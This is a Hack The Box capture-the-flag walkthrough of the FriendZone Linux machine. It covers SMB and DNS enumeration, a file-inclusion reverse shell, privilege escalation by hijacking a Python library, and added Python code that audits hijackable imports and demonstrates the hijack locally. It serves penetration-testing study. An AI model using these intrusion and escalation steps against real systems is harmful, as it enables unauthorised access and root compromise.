OSCP Preparations – HTB FriendZone

FriendZone is a retired Hack The Box machine running Linux. The goal is to obtain the user and root flags by exploiting its vulnerabilities.
We start with a network scan of the target machine.


Classic Scan

Full port scan

The scan shows the following open ports: 21/tcp ftp, 22/tcp ssh, 53/tcp domain, 80/tcp http, 139/tcp netbios-ssn, 443/tcp https, 445/tcp microsoft-ds, 53/udp domain, 137/udp netbios-ns and 138/udp netbios-dgm (open|filtered).

Since the SMB ports 139 and 445 are open, we enumerate the SMB shares.

The scan lists the following shares:

Share         Permissions   Comment
Files         NO ACCESS     FriendZone Samba Server Files /etc/Files
general       READ ONLY     FriendZone Samba Server Files
Development   READ, WRITE   FriendZone Samba Server Files

Three shares are exposed; Development is the only one we can write to.
To see which files are inside these shares, we run the scan again with the -R parameter (recursive listing).

The general share contains a creds.txt file, which we retrieve with smbclient. smbclient connects to a share on the target; we connect to general and download creds.txt.

Let's read the contents of creds.txt:

admin:WORKWORKHhallelujah@#
We try these credentials against FTP, SSH and SMB in turn, but none of them accepts the login, so we make a note of them and move on.
The next open port is HTTP (80); we open it in the browser to enumerate it.

We checked the page source and the developer tools but found nothing of value.
Let's look at HTTPS (443) in the browser as well.

The page cannot be accessed, so let's look at the certificate instead.

The certificate reveals the domain friendzone.red. Since the target also runs DNS on port 53, we use the host command to request a zone transfer of friendzone.red from it, which lists the subdomains in the zone:

administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1

The records point at 127.0.0.1, the target's own loopback address, so to reach these virtual hosts we map each name to the target's IP address in our /etc/hosts file.
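The following is an added example (not part of the original walkthrough) that turns zone-transfer records like the ones above into /etc/hosts entries. It embeds the three records as constructed sample input, flags that the zone advertises loopback addresses (useless to us as a client), maps every name to an assumed target address (TARGET_IP is a placeholder, substitute the machine's real IP), and merges the entries into an existing hosts file without duplicating names that are already mapped.

```python
import ipaddress
import re

# Constructed sample input: the A records the zone transfer returned for
# friendzone.red (copied from the walkthrough output above).
ZONE_TRANSFER_OUTPUT = """\
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
"""

# Assumption: the lab machine's address. Substitute the real target IP.
TARGET_IP = "10.10.10.123"

# name  TTL  IN  TYPE  DATA  (zone-file style, as printed by host -l / dig axfr)
RECORD_RE = re.compile(
    r"^(?P<name>[^\s;]+?)\.?\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>\S+)\s*$"
)


def parse_records(text):
    """Parse zone-file style lines into dicts; comments (';') and
    non-matching lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        match = RECORD_RE.match(line)
        if match:
            record = match.groupdict()
            record["ttl"] = int(record["ttl"])
            records.append(record)
    return records


def loopback_names(records):
    """Names whose A record points at a loopback address. The zone describes
    the server's own view of itself, so these values must not be reused
    verbatim on the attacking machine."""
    return sorted(
        r["name"] for r in records
        if r["type"] == "A" and ipaddress.ip_address(r["data"]).is_loopback
    )


def hosts_entries(records, target_ip, apex):
    """Build /etc/hosts lines mapping the apex and every A/AAAA name from the
    transfer to the target's real IP, ignoring the address in the zone."""
    names = {r["name"] for r in records if r["type"] in ("A", "AAAA")}
    names.add(apex)
    return [f"{target_ip}\t{name}" for name in sorted(names)]


def merge_hosts(existing, entries):
    """Append entries to an existing hosts file text, skipping names that are
    already mapped (to any IP) so that repeated runs stay idempotent."""
    known = set()
    for line in existing.splitlines():
        fields = line.split("#", 1)[0].split()
        known.update(fields[1:])
    new = [entry for entry in entries if entry.split()[1] not in known]
    if not new:
        return existing
    base = existing.rstrip("\n")
    return (base + "\n" if base else "") + "\n".join(new) + "\n"


if __name__ == "__main__":
    recs = parse_records(ZONE_TRANSFER_OUTPUT)
    print("names advertised as loopback:", loopback_names(recs))
    entries = hosts_entries(recs, TARGET_IP, "friendzone.red")
    print(merge_hosts("127.0.0.1\tlocalhost\n", entries), end="")
```

Run it and paste the printed block into /etc/hosts; merge_hosts can also be fed the current file contents so that an entry added by hand earlier is not duplicated.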

Now let's visit each of the detected domains in turn:
friendzone.red

hr.friendzone.red

 uploads.friendzone.red

administrator1.friendzone.red

The login form on administrator1.friendzone.red immediately catches our attention; we try the credentials obtained from SMB and log in successfully.

The page tells us to go to /dashboard.php, so let's do that.

The dashboard states that the default URL parameters are image_id=a.jpg&pagename=timestamp. Let's supply them and see what happens.

We examine the image displayed on the page and see that the images are served from the /images directory.

We can see the files a.jpg and b.jpg. Remembering the uploads subdomain, we assume files uploaded there land in this directory, so let's upload our shell file.

Going straight back to /images, we see that no file was actually uploaded.

We will have to get a shell another way.
Going back to https://administrator1.friendzone.red, we noticed that the pagename=timestamp parameter includes a page by name, so it should let us load other files. The SMB scan showed that we have write access to the Development share, so we will upload a shell there and include it through the pagename parameter to get code execution.
We upload the PHP reverse shell from Pentest Monkey to the Development share with smbclient's put command.

Now we start a netcat listener and request the uploaded file through the pagename parameter.

We get a shell as www-data.
We search for the user flag with the locate command and find it.

We tried to access the root directory and got a permission denied error.
Let's begin the privilege escalation enumeration steps.

We transfer linpeas.sh to the target machine and start the enumeration.

Among the results, the MySQL configuration file stands out; reading it with the cat command reveals credentials:

db_user=friend
db_pass=Agpyu12!0.213$
Let's use these credentials to switch user with su.

We are now the friend user, and we enumerate again from this account to find a path to root.
We run the linpeas.sh copy located in /tmp.

The enumeration yields nothing useful, so we transfer pspy to the target and run it to watch for scheduled processes that might give us an escalation path.

Here reporter.py catches our attention.
Let's look at the file and its contents:

The script handles mail reporting and is run by root on a schedule; because it imports a Python library we can modify, we will apply Python library hijacking (https://rastating.github.io/privilege-escalation-via-python-library-hijacking/).

We locate the os library file that reporter.py imports; it is writable by our user, so we append a command to it that gives us a reverse shell.

After making the edits, we start an ncat listener and wait for the scheduled run of reporter.py.
When reporter.py runs, we receive a root shell and read the root flag.
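The following is an added example (not from the walkthrough or the linked article) that shows the check behind this step and reproduces the technique locally without touching any real library. hijackable() resolves each module a script imports and reports whether the module file itself is writable (the os.py case used above) and which writable directories precede it on the search path (where a same-named file would shadow it). demo() then builds a throwaway reporter.py and a hypothetical report_utils library in a scratch directory and exercises both routes; a marker file stands in for the reverse shell payload. reporter.py, report_utils and the marker are assumptions of the example, not files from the target.

```python
import ast
import importlib.machinery
import os
import subprocess
import sys
import tempfile


def imported_modules(script_path):
    """Statically list the top-level modules a script imports (what we would
    do with reporter.py before choosing a library to target)."""
    with open(script_path) as fh:
        tree = ast.parse(fh.read())
    names = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return sorted(names)


def hijackable(module_names, search_path=None):
    """Resolve each module on the given search path (sys.path by default) and
    report: writable_file (we can edit the module in place, the os.py route)
    and writable_dirs_before (directories earlier on the path where a
    same-named file would shadow it). Modules without a source file on disk
    (builtins, zipped stdlib) are reported as not hijackable either way."""
    path = list(sys.path if search_path is None else search_path)
    report = {}
    for name in module_names:
        spec = importlib.machinery.PathFinder.find_spec(name, path)
        origin = spec.origin if spec is not None and spec.origin else None
        if origin is None or not os.path.isfile(origin):
            report[name] = {"file": None, "writable_file": False, "writable_dirs_before": []}
            continue
        module_dir = os.path.dirname(os.path.abspath(origin))
        if spec.submodule_search_locations is not None:  # package: __init__.py is one level down
            module_dir = os.path.dirname(module_dir)
        shadow_dirs = []
        for entry in path:
            directory = os.path.abspath(entry or os.getcwd())
            if directory == module_dir:
                break  # the real module is found here; later entries cannot shadow it
            if os.path.isdir(directory) and os.access(directory, os.W_OK):
                shadow_dirs.append(directory)
        report[name] = {
            "file": origin,
            "writable_file": os.access(origin, os.W_OK),
            "writable_dirs_before": shadow_dirs,
        }
    return report


def demo(workdir):
    """Reproduce both hijack routes against a throwaway script in workdir and
    return what the script imported each time plus the audit of its imports.
    The payload only writes a marker file; on a real target it would be a
    reverse shell (hypothetical names: reporter.py, report_utils, payload_ran)."""
    lib = os.path.join(workdir, "lib")
    evil = os.path.join(workdir, "evil")
    os.makedirs(lib)
    os.makedirs(evil)
    marker = os.path.join(workdir, "payload_ran")
    helper = os.path.join(lib, "report_utils.py")  # the legitimate library
    with open(helper, "w") as fh:
        fh.write('TAG = "legit"\n')
    victim = os.path.join(workdir, "reporter.py")  # stand-in for the scheduled script
    with open(victim, "w") as fh:
        fh.write("import os\nimport report_utils\nprint(report_utils.TAG)\n")

    def run(pythonpath):
        env = dict(os.environ, PYTHONPATH=pythonpath)
        proc = subprocess.run([sys.executable, victim], env=env, capture_output=True, text=True)
        return proc.stdout.strip()

    results = {"audit": hijackable(imported_modules(victim), [evil, lib] + sys.path)}
    results["clean"] = run(lib)
    # Route 1 (the os.py edit above): the module file is writable, so append the
    # payload; it executes the next time the script imports the module.
    with open(helper, "a") as fh:
        fh.write(f'open({marker!r}, "w").write("payload ran")\nTAG = "edited"\n')
    results["edited"] = run(lib)
    results["marker_written"] = os.path.exists(marker)
    # Route 2: a writable directory earlier on the search path shadows the module.
    with open(os.path.join(evil, "report_utils.py"), "w") as fh:
        fh.write('TAG = "shadowed"\n')
    results["shadowed"] = run(evil + os.pathsep + lib)
    return results


def run_demo():
    with tempfile.TemporaryDirectory() as workdir:
        return demo(workdir)


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(key, value)
```

On a target, call hijackable(imported_modules("/path/to/reporter.py")) as the low-privileged user: a module with writable_file set is the os.py situation, and a non-empty writable_dirs_before (typically the script's own directory, which Python puts first on sys.path) is the shadowing variant. Either way the payload runs with the privileges of whoever runs the scheduled script, so the listener must be up before the next run.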